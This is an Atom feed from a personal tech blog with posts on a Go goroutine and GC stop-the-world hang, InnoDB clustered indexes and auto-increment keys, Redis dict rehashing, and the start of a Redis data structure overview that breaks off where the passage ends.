<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>xlzd 杂谈</title>
<subtitle>blog of xlzd</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="https://xlzd.me/"/>
<updated>2019-05-14T06:33:49.576Z</updated>
<id>https://xlzd.me/</id>
<author>
<name>xlzd</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>An interesting little detail in Golang</title>
<link href="https://xlzd.me/2018/09/18/golang-stop-the-world/"/>
<id>https://xlzd.me/2018/09/18/golang-stop-the-world/</id>
<published>2018-09-17T16:43:55.000Z</published>
<updated>2019-05-14T06:33:49.576Z</updated>
<content type="html"><![CDATA[<p>A few days ago a colleague asked on the company Slack why the following Golang code hangs (<a href="https://play.golang.org/p/nxo4D832JCo" target="_blank" rel="noopener">Go Playground</a>):</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"fmt"</span></span><br><span class="line"><span class="string">"runtime"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">var</span> i <span class="keyword">byte</span></span><br><span class="line"><span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> i = <span class="number">0</span>; i <= <span class="number">255</span>; i++ {</span><br><span class="line">}</span><br><span class="line">}()</span><br><span class="line">fmt.Println(<span class="string">"Dropping mic"</span>)</span><br><span class="line"><span class="comment">// Yield execution to force 
executing other goroutines</span></span><br><span class="line">runtime.Gosched()</span><br><span class="line">runtime.GC()</span><br><span class="line">fmt.Println(<span class="string">"Done"</span>)</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>This is an interesting question. It touches on roughly three Golang concepts:</p><ol><li>What byte is</li><li>How goroutines are scheduled</li><li>What happens when Golang runs a GC</li></ol><p>This post tries to explain briefly why the program above hangs.</p><p>First, let's look at what the goroutine started in main actually is:<br><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> i <span class="keyword">byte</span></span><br><span class="line"><span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> i = <span class="number">0</span>; i <= <span class="number">255</span>; i++ {</span><br><span class="line">}</span><br><span class="line">}()</span><br></pre></td></tr></table></figure></p><p>In Golang, byte is an alias for uint8. The loop condition therefore always holds: when i reaches 255, i++ overflows and wraps around to 0, so <code>i <= 255</code> is always true. In other words the for loop can never exit, and the code above is equivalent to:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> {}</span><br><span class="line">}()</span><br></pre></td></tr></table></figure><p>Second, goroutine scheduling is a very complex topic, and this post does not attempt to cover it in full.<br>Roughly speaking, goroutine scheduling in Golang as of this writing (<a 
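href="https://docs.google.com/document/d/1TTj4T2JO42uD5ID9e89oa0sLKhJYD0Y_kqxDv3I3XMw/edit" target="_blank" rel="noopener">Scalable Go Scheduler Design Doc</a>) is based on the GPM model: G stands for a goroutine, M can be thought of as the real resource (an OS thread), and P is the layer between G and M that multiplexes many goroutines onto one OS thread. The model looks roughly like this (image borrowed from Google Image Search):</p><p><img src="https://user-images.githubusercontent.com/5506906/45667496-fdcfde80-bb4b-11e8-9c03-d35ef0897685.png" alt="image"></p><p>As the figure shows, several Gs hang off each P. When one G finishes, P picks the next G to run. And when a G runs for too long without finishing, the Gs queued behind it still need a chance to run. So besides scheduling the next goroutine when one finishes, the Go scheduler also takes the running goroutine off the processor and schedules the next one when the running goroutine hits any of the following:</p><ul><li>IO operations</li><li>Blocking on a channel</li><li>System calls</li><li>Running for a long time</li></ul><p>We don't care about the first three here. In the last case, if a goroutine has been running too long, the scheduler sets a flag (preempt) on its G object. <strong>When the goroutine makes a function call</strong>, it first checks this flag and yields if the flag is true. (This is a rough description. The reality is more involved, but it is not the focus of this post, so the details are skipped.)</p><p>Back to the example at the start of this post: the goroutine started in main is an infinite loop with no IO blocking, no channel blocking, no system calls and no function calls. In other words, it can never yield on its own, even after it has run for a long time and the scheduler has already set preempt.</p><p>As the figure above shows, once this G (goroutine) gets to run, the Gs behind it can no longer be scheduled by the current P. To make sure this G does get to run, the program above calls <code>runtime.Gosched()</code> in the main goroutine to yield.</p><p>The number of Ps is set by GOMAXPROCS and defaults to the number of CPUs on the machine.</p><p>There are two cases:</p><ol><li>On a single-core machine there is only one P by default, so the program hangs as soon as this G is scheduled, because the main goroutine never gets scheduled again.</li><li>On a multi-core machine the program does not hang at this step: once the G queue of another P runs dry, that P steals Gs from other Ps via the work-stealing algorithm, so the main goroutine can still be scheduled by another P.</li></ol><p>Yet the code at the start of this post hangs on single-core and multi-core machines alike.</p><p>This brings us to the third point: Golang's GC.</p><p>Golang's GC is fundamentally based on <strong>mark-and-sweep</strong> (and has been refined repeatedly on top of that).<br>As the name suggests, mark-and-sweep has two phases:</p><ul><li>Mark</li><li>Sweep</li></ul><p>Starting the mark phase requires STW (Stop The World), which means stopping every running goroutine. The relevant source is roughly <a href="https://github.com/golang/go/blob/release-branch.go1.11/src/runtime/mgc.go#L1316" target="_blank" rel="noopener">here</a>:<br><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 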
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">gcStart</span><span class="params">(mode gcMode, trigger gcTrigger)</span></span> {</span><br><span class="line"></span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line">systemstack(stopTheWorldWithSema)</span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>At this point the looping goroutine can never be stopped, for the reasons described above, while the main goroutine is blocked in the GC's STW, waiting for all goroutines to stop. The main goroutine is waiting for a G that will never stop for it, so the program hangs.</p><p>Similarly, changing GOMAXPROCS also requires STW, so the code below hangs for exactly the same reason as the code at the start of this post (<a href="https://play.golang.org/p/vvuD1smj9RM" target="_blank" rel="noopener">Go Playground</a>):</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"fmt"</span></span><br><span class="line"><span 
class="string">"runtime"</span></span><br><span class="line"><span class="string">"time"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">forever</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> {</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">go</span> forever()</span><br><span class="line"></span><br><span class="line">time.Sleep(time.Millisecond) <span class="comment">// yield execution</span></span><br><span class="line">runtime.GOMAXPROCS(<span class="number">1926</span>) <span class="comment">// waits for STW</span></span><br><span class="line">fmt.Println(<span class="string">"Done"</span>) <span class="comment">// never reached</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Just a few lines of code, yet there is a surprising amount of subtlety in them.</p>]]></content>
<summary type="html">
<p>A few days ago a colleague asked on the company Slack why the following Golang code hangs (<a href="https://play.golang.org/p/nxo4D832JCo" target="_blank" rel="noopener">Go Playground</a>):
</summary>
<category term="Golang" scheme="https://xlzd.me/tags/Golang/"/>
</entry>
<entry>
<title>Why MySQL InnoDB tables should use an auto-incrementing primary key ID</title>
<link href="https://xlzd.me/2018/09/14/why-mysql-innodb-need-auto-increment-primary-key/"/>
<id>https://xlzd.me/2018/09/14/why-mysql-innodb-need-auto-increment-primary-key/</id>
<published>2018-09-14T13:33:53.000Z</published>
<updated>2019-05-14T06:33:49.584Z</updated>
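<content type="html"><![CDATA[<p>Less experienced programmers designing tables often hear veteran DBAs recommend an auto-incrementing primary key ID rather than IDs generated by schemes such as UUID. The usual justification is something like "InnoDB is faster with an auto-increment primary key". This post tries to explain why.</p><h2 id="聚簇索引"><a href="#聚簇索引" class="headerlink" title="聚簇索引"></a>Clustered index</h2><p>In InnoDB every table has a <strong>clustered index</strong>. When a primary key is defined, the primary key columns are stored as the clustered index. A clustered index means that the row data is actually stored in the leaf nodes of the index, and "clustered" means that rows with adjacent key values are stored close together. Because a row cannot be stored in two different places at once (or it is not worth doing so), a table can have only one clustered index.</p><p>InnoDB chooses the clustered index in roughly this order of priority:</p><ol><li>If a primary key is defined, use the primary key;</li><li>If no primary key is defined, use the first UNIQUE KEY whose columns are all NOT NULL;</li><li>If neither exists, implicitly define a hidden primary key to serve as the clustered index.</li></ol><p>The figure below shows how records (data) are laid out in a clustered index:</p><p><img src="https://user-images.githubusercontent.com/5506906/45551535-d71a5b00-b860-11e8-914b-ff6bba012b17.png" alt="image"></p><p>As the figure shows, the clustered index stores not only the index but also the data of the whole table, in its leaf nodes. You can think of the clustered index in InnoDB as "being" the table. Correspondingly, the leaf nodes of every other InnoDB index store the primary key value. Storing the primary key value instead of the physical location of the row reduces the maintenance work on secondary indexes when rows move or data pages split.</p><h2 id="聚簇与非聚簇表的数据存储方式"><a href="#聚簇与非聚簇表的数据存储方式" class="headerlink" title="聚簇与非聚簇表的数据存储方式"></a>How clustered and non-clustered tables store data</h2><p>Suppose we have the following table:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552024-2614c000-b862-11e8-8009-4ec017ee5645.png" alt="image"></p><p>Suppose column col1 is the primary key. The clustered index is then stored like this:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552432-83f5d780-b863-11e8-987f-03913bcceb9e.png" alt="image"></p><p>(Ignore TID and RP for now. They are the transaction ID and the rollback pointer.) As shown above, the clustered index stores not only the value of col1 but also the values of the other columns (col2 in this example).<br>If col2 has an ordinary index, that index is stored like this:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552536-cd462700-b863-11e8-937d-777ee488ba49.png" alt="image"></p><p>As you can see, the leaf nodes of this B+ tree store the primary key value of the corresponding row.</p><p>In the abstract, InnoDB stores the primary key index (the clustered index) with the following structure:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552757-8a388380-b864-11e8-8cf6-ad0c46847e58.png" alt="image"></p><p>InnoDB stores secondary indexes with the following structure:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552771-915f9180-b864-11e8-8b3a-93da00f27aa7.png" alt="image"></p><p>For comparison, MyISAM (another MySQL 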
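storage engine) stores its primary key index and secondary indexes like this:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552785-97ee0900-b864-11e8-8471-3bee5dd3a93e.png" alt="image"></p><h2 id="InnoDB-表中按主键顺序插入"><a href="#InnoDB-表中按主键顺序插入" class="headerlink" title="InnoDB 表中按主键顺序插入"></a>Inserting in primary key order in InnoDB tables</h2><p>Generally speaking, an auto-increment (AUTO_INCREMENT) ID that is unrelated to the business data guarantees that rows are written in order as they are inserted. Suppose instead that we use a UUID as the clustered index: the position at which each row lands in the clustered index becomes completely random. A large number of random inserts causes many page splits and a lot of fragmentation.</p><p>The figure below shows how the clustered index stores inserted rows when the keys arrive in increasing order:<br><img src="https://user-images.githubusercontent.com/5506906/45553171-c1f3fb00-b865-11e8-8175-2bb1a4562003.png" alt="image"></p><p>Because the primary key is ordered, InnoDB stores each record right after the previous one. When the current page is almost full (almost rather than completely, because InnoDB reserves some space for later modifications, 1/16 of the page by default), the next record is written to a new page. All inserted data ends up, in order, at the tail of the clustered index.</p><p>By contrast, with a UUID as the primary key, InnoDB inserts rows at effectively random positions in the clustered index:</p><p><img src="https://user-images.githubusercontent.com/5506906/45553481-97ef0880-b866-11e8-88e5-441043983a2e.png" alt="image"></p><p>As shown above, the primary key of a newly inserted row is not necessarily larger than the ones before it (UUIDs are highly random), so InnoDB cannot simply append the new row at the end of the index. It has to find the right position for the row based on its primary key value and allocate space for it there. Using a UUID as the clustered index has the following drawbacks:</p><ul><li>The target page may already have been flushed to disk and dropped from memory, or may never have been loaded into memory, so InnoDB has to locate it and read it from disk before inserting. This causes a large amount of random disk IO.</li><li>Because writes arrive out of order, InnoDB has to split pages frequently to make room for new rows. A page split moves a lot of data.</li><li>Because of the frequent page splits, pages become sparse and irregularly filled, so the data ends up fragmented.</li></ul><p>So when using InnoDB you should, as far as possible, insert data in order with a monotonically increasing primary key ID. AUTO_INCREMENT is not the only way to get monotonically increasing IDs. Some distributed ID generator algorithms, for example, also produce increasing ID sequences.</p><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>Summary</h2><p>This post briefly explained why an auto-increment ID rather than a UUID should be used as the primary key ID of an InnoDB table.</p><p><em>Note: the figures in this post are taken from High Performance MySQL.</em></p>]]></content>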
<summary type="html">
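<p>Less experienced programmers designing tables often hear veteran DBAs recommend an auto-incrementing primary key ID rather than IDs generated by schemes such as UUID. The usual justification is something like "InnoDB is faster with an auto-increment primary key". This post tries to explain why.</p>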
<h2 id="聚簇索引"><a href="#
</summary>
<category term="MySQL" scheme="https://xlzd.me/tags/MySQL/"/>
</entry>
<entry>
<title>Redis dict rehash</title>
<link href="https://xlzd.me/2018/09/04/redis-dict-rehash/"/>
<id>https://xlzd.me/2018/09/04/redis-dict-rehash/</id>
<published>2018-09-04T12:06:29.000Z</published>
<updated>2019-05-14T06:33:49.582Z</updated>
<content type="html"><![CDATA[<p>The dictionary (<code>dict</code>) is a very commonly used data structure in the Redis implementation. For example, it is one of the underlying implementations of set and hash, and it is also the basic format in which redisDb stores all data in a Redis database.</p><h2 id="dict-的实现"><a href="#dict-的实现" class="headerlink" title="dict 的实现"></a>Implementation of dict</h2><h3 id="dictht-hash-table-amp-dictEntry"><a href="#dictht-hash-table-amp-dictEntry" class="headerlink" title="dictht(hash table) & dictEntry"></a>dictht(hash table) & dictEntry</h3><p>The dict structure in Redis is a wrapper around a hash table (called dictht in Redis). Here is the <a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L69-74" target="_blank" rel="noopener">definition of dictht</a> in Redis 4.0:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictht</span> {</span></span><br><span class="line"> dictEntry **table; <span class="comment">// where the hash table is actually stored</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> size; <span class="comment">// size of table</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> sizemask; <span class="comment">// mask for computing the index, always size - 1</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> used; <span class="comment">// number of entries in use</span></span><br><span class="line">} dictht;</span><br></pre></td></tr></table></figure><p>As shown above, the table field points to the start of an array of <code>dictEntry</code> pointers (in effect it is the <code>dictEntry</code> pointer array), which stores the key-value pairs. size records the length of table, and used records the number of nodes already stored.</p><p>Here is the <a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L47-56" target="_blank" rel="noopener">definition of dictEntry</a>:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> {</span></span><br><span class="line"> <span class="keyword">void</span> *key;</span><br><span class="line"> <span class="keyword">union</span> {</span><br><span class="line"> <span class="keyword">void</span> *val;</span><br><span class="line"> <span class="keyword">uint64_t</span> u64;</span><br><span class="line"> <span class="keyword">int64_t</span> s64;</span><br><span class="line"> <span class="keyword">double</span> d;</span><br><span class="line"> } v;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> *<span class="title">next</span>;</span></span><br><span class="line">} dictEntry;</span><br></pre></td></tr></table></figure><p>As shown above, key is the key of a key-value pair and v is the corresponding value. Besides the key and value, each dictEntry has a next pointer that points to the next node with the same hash, which is how hash collisions are resolved.</p><p>In the figure below, if k1 and k2 have the same hash, they are linked together through the next pointer:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ 
+----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ +---------+</span><br><span class="line">| | +----------+ | entry | next | entry | next</span><br><span class="line">| sizemask| | 1 +------->+---------+----->+---------+----->NULL</span><br><span class="line">| | +----------+ | k1 | v1 | | k2 | v2 |</span><br><span class="line">| used | | 2 +->NULL +---------+ +---------+</span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br></pre></td></tr></table></figure><h3 id="dict"><a href="#dict" class="headerlink" title="dict"></a>dict</h3><p>The <a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L76-82" target="_blank" rel="noopener">definition of dict</a> in Redis 4.0 is as follows:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictType</span> {</span></span><br><span class="line"> <span class="comment">// compute the hash value</span></span><br><span class="line"> <span 
class="keyword">uint64_t</span> (*hashFunction)(<span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// duplicate a key</span></span><br><span class="line"> <span class="keyword">void</span> *(*keyDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// duplicate a value</span></span><br><span class="line"> <span class="keyword">void</span> *(*valDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *obj);</span><br><span class="line"> <span class="comment">// compare keys</span></span><br><span class="line"> <span class="keyword">int</span> (*keyCompare)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key1, <span class="keyword">const</span> <span class="keyword">void</span> *key2);</span><br><span class="line"> <span class="comment">// destroy a key</span></span><br><span class="line"> <span class="keyword">void</span> (*keyDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// destroy a value</span></span><br><span class="line"> <span class="keyword">void</span> (*valDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *obj);</span><br><span class="line">} dictType;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dict</span> {</span></span><br><span class="line"> dictType *type;</span><br><span class="line"> <span class="keyword">void</span> *privdata;</span><br><span class="line"> dictht ht[<span class="number">2</span>];</span><br><span class="line"> <span class="keyword">long</span> 
rehashidx; <span class="comment">/* rehashing not in progress if rehashidx == -1 */</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> iterators; <span class="comment">/* number of iterators currently running */</span></span><br><span class="line">} dict;</span><br></pre></td></tr></table></figure><p>Start with dictType. Since the key in dictEntry is a <code>void*</code> and v can also be a <code>void*</code>, there has to be some way to operate on the concrete keys and values. dictType defines a set of function pointers, and the type pointer of a dict object refers to the dictType that implements them for that dict's key-value pairs: hashing, duplicating keys and values, comparing keys, and destroying keys and values. This is how dict achieves polymorphism.</p><p>In the dict struct, privdata holds the extra argument that has to be passed to the functions in dictType (the privdata pointer in their signatures).</p><p>ht is an array of two dictht objects. ht[0] stores the data, and ht[1] is used during rehashing, as described below.</p><p>rehashidx records the progress of a rehash and is covered in detail later in this post.</p><p>When no rehash is in progress, ht[1] is an empty dictht.</p><h2 id="hash-冲突"><a href="#hash-冲突" class="headerlink" title="hash 冲突"></a>Hash collisions</h2><p>A hash table essentially maps hash(key) into its own table array.<br>For a dict object, the slot that a dictEntry maps to is found with the following computation:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hash = dict->type->hashFunction(dictEntry->key);</span><br><span class="line">position = hash & dict->ht[<span class="number">0</span>].sizemask;</span><br></pre></td></tr></table></figure></p><p>Now imagine that two keys have the same hash value, or the same value of hash & sizemask. Two different keys are then mapped to the same slot of dictht.table, which is a hash collision.</p><p>This is what the next pointer in the dictEntry struct above is for: Redis uses it to chain colliding dictEntry nodes together and so resolve the collision.</p><p>Because a dictEntry only has a next pointer, for performance reasons a new node that collides is always added at the head of the linked list, which takes only O(1) time.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">before: a dictht containing k1-v1:</span><br><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ +----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ </span><br><span class="line">| | +----------+ | entry | </span><br><span class="line">| sizemask| | 1 +------->+---------+ </span><br><span class="line">| | +----------+ | k1 | v1 | </span><br><span class="line">| used | | 2 +->NULL +---------+ </span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br><span class="line"></span><br><span class="line">after: when k2 collides with k1, k2 is inserted at the head of the list:</span><br><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ +----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ +---------+</span><br><span class="line">| | +----------+ | entry | next | entry | next</span><br><span class="line">| sizemask| | 1 
+------->+---------+----->+---------+----->NULL</span><br><span class="line">| | +----------+ | k2 | v2 | | k1 | v1 |</span><br><span class="line">| used | | 2 +->NULL +---------+ +---------+</span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br></pre></td></tr></table></figure><h2 id="rehash-过程"><a href="#rehash-过程" class="headerlink" title="rehash 过程"></a>The rehash process</h2><p>As dictEntry nodes keep being inserted into or deleted from a dictht, its table size may become too small or too large for the number of elements currently stored.<br>The measure of "too large" and "too small" is the <strong>load factor</strong>, which is computed as:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">loadFactor = dictht.used / dictht.size</span><br></pre></td></tr></table></figure><p>For the example above, the load factor is 2 / 4 = 0.5.</p><p>Redis resizes a dictht in the following cases:</p><ol><li>When the server is running BGSAVE/BGREWRITEAOF and the load factor is greater than 5, Redis expands the dictht;</li><li>When the server is not running BGSAVE/BGREWRITEAOF and the load factor is at least 1, Redis expands the dictht;</li><li>When the load factor is less than 0.1, Redis shrinks the dictht.</li></ol><p>When one of these conditions is met, Redis triggers a rehash. The steps are:</p><ol><li>Allocate space for dict->ht[1]. The size depends on whether the dict is being expanded or shrunk, and on ht[0].used (the current size of the dict):<br> a. When expanding, the new size is the first 2^n value ≥ ht[0].used * 2;<br> b. 
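When shrinking, the new size is the first 2^n value ≥ ht[0].used.</li><li>Rehash every key-value pair in ht[0].table into ht[1].table, one by one. That is, compute the hash of each dictEntry's key and map the entry into the new dictht.table.</li><li>Once every dictEntry in ht[0].table has been migrated to ht[1].table, free ht[0], make ht[1] the new ht[0], and create an empty dictht at ht[1].</li></ol><h2 id="渐进式-rehash"><a href="#渐进式-rehash" class="headerlink" title="渐进式 rehash"></a>Incremental rehash</h2><p>When a dict is rehashed, every dictEntry in ht[0] has to be rehashed into ht[1]. If the dict is already very large, this operation is very slow, slow enough to affect the performance of the service Redis provides.<br>So in Redis's implementation the rehash is not done in one blocking pass. It is split into many steps and completed incrementally. The dict->rehashidx field mentioned above is what tracks the progress of the rehash.</p><p>The incremental rehash works roughly as follows:</p><ol><li>Allocate a suitable amount of space for dict->ht[1]. The dict now holds both ht[0] and ht[1];</li><li>Set dict->rehashidx to 0 to mark the start of the rehash;</li><li>During the rehash, whenever an insert, delete, update or lookup is performed on the dict, Redis carries out the operation and also rehashes the dictEntry nodes at dict->ht[0].table[dict->rehashidx] into dict->ht[1], then increments rehashidx by one;</li><li>As the rehash proceeds, all elements of dict->ht[0] are eventually rehashed into dict->ht[1]. The rehash is then complete and rehashidx is set to -1;</li><li>Free ht[0], make ht[1] the new ht[0], and create an empty dictht at ht[1].</li></ol><p>During the rehash, newly inserted elements go straight into dict->ht[1], and nothing more is inserted into ht[0].<br>Meanwhile both dict->ht[0] and ht[1] hold part of the data, so lookups, deletes and updates on the dict are performed against both dictht objects while the rehash is in progress. For example, when deleting a key, if the key does not exist in dict->ht[0], Redis also looks for it in dict->ht[1] and deletes it there if it exists.</p><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>Summary</h2><p>This post reviewed how dict is implemented in Redis, how hash collisions are resolved, and how a dict is expanded and shrunk.</p>]]></content>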
<summary type="html">
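<p>The dictionary (<code>dict</code>) is a very commonly used data structure in the Redis implementation. For example, it is one of the underlying implementations of set and hash, and it is also the basic format in which redisDb stores all data in a Redis database.</p>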
<h2 id="dict-的实现"><a hr
</summary>
<category term="Redis" scheme="https://xlzd.me/tags/Redis/"/>
<category term="data-structure" scheme="https://xlzd.me/tags/data-structure/"/>
</entry>
<entry>
<title>Redis data structure overview</title>
<link href="https://xlzd.me/2018/09/01/redis-data-structure-overview/"/>
<id>https://xlzd.me/2018/09/01/redis-data-structure-overview/</id>
<published>2018-08-31T17:52:13.000Z</published>
<updated>2019-05-14T06:33:49.582Z</updated>
<content type="html"><![CDATA[<p>Most backend developers use Redis as a data store or cache. At many of the internet companies I know of, Redis plays a role that is hard to replace. This post gives a brief introduction to some of the data structures used in Redis's implementation.</p><hr><h2 id="Redis-用户侧支持的数据结构"><a href="#Redis-用户侧支持的数据结构" class="headerlink" title="Redis 用户侧支持的数据结构"></a>Data structures Redis exposes to users</h2><p>For a complete Redis command reference, see <a href="http://redisdoc.com/" target="_blank" rel="noopener">redisdoc.com</a>.</p><h3 id="string"><a href="#string" class="headerlink" title="string"></a>string</h3><p>Stores objects such as strings, integers and floating-point numbers as key-value pairs.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+---------+ +---------+</span><br><span class="line">| key +--->| value |</span><br><span class="line">+---------+ +---------+</span><br></pre></td></tr></table></figure></p><p>Although it is called "string", it is really more like a byte sequence (the underlying storage is a byte array), so you can store anything in a string: an object serialized with Python pickle, the binary content of an image, and so on.<br>Part of the reason for calling a string a byte array is that Redis provides commands that operate directly on its bits, such as SETBIT and GETBIT.<br>Where it differs from a plain 